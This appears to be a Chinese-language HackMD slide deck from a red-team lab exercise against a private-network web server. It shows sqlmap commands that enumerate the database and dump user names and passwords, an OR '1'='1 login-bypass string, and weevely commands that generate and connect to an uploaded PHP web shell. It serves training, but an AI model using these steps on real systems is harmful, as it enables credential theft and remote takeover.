{%hackmd theme-dark %} <!-- [TOC] --> # 0425-Red-Team-打機器(SQL-Inj) --- ## 找注入點:測試id ![](https://i.imgur.com/Ar2GWzl.jpg =80%x) ---- ## 找注入點:測試id ![](https://i.imgur.com/KNk2DZF.jpg) ---- ## 找到注入點 -> 起手式:找Database ```sql= sqlmap -u 10.99.62.50/site/content?id=2 --dbs ``` ![](https://i.imgur.com/wsZJdGH.jpg =60%x) ---- ## 第二式:找tables ```sql\= sqlmap -u 10.99.62.50/site/content?id=2 -D information_schema --tables ``` ![](https://i.imgur.com/k5xg3hy.jpg) 對users非常有興趣 ---- ## 第三式:找columns ```sql= sqlmap -u 10.99.62.50/site/content?id=2 -D blog_vulnerability -T users --columns ``` ![](https://i.imgur.com/lKRRIX8.jpg) ---- ## Dump 出密碼 ```sql= sqlmap -u 10.99.62.50/site/content?id=2 -D blog_vulnerability -T users -C name, password --dump --batch ``` ![](https://i.imgur.com/gU3AMFL.jpg) --- ## dirb http://10.99.62.50 - 找到子目錄 - /admin/login --- ## Login ![](https://i.imgur.com/nE1Vvrv.jpg) --- ## Sql-Injection Combo ```sql= 1' OR '1'='1 -- ``` ---- ## 登入 ![](https://i.imgur.com/Pa7Glk7.jpg =80%x) ---- ## 上傳功能 ![](https://i.imgur.com/GY03WH9.jpg =80%x) ---- ### php reverse shell? - Local是Server,等待連線 Victim當Client ### weevely? - Local是Client, Victim當Server等待連線 ---- ## weevely 使用方法 1. 生Payload: weevely generate [password] [path] ```sql= weevely genetate 1234 ./reverse_shell.php ``` 2. 連線: weevely [網址] [password] ```sql= weevely https://10.99.62.50/upload/imgs/content/44/backdoor-test.php 1234 ``` ---- ## Get Shell ![](https://i.imgur.com/2x1xsA5.jpg) --- ## Nmap ![](https://i.imgur.com/wc2umqh.jpg) ---
{"metaMigratedAt":"2023-06-15T07:10:55.050Z","metaMigratedFrom":"YAML","title":"0425-Red-Team-打機器","breaks":true,"contributors":"[{\"id\":\"6a610fe4-c967-47b5-84b7-1d26faef3c47\",\"add\":1831,\"del\":132}]"}
    348 views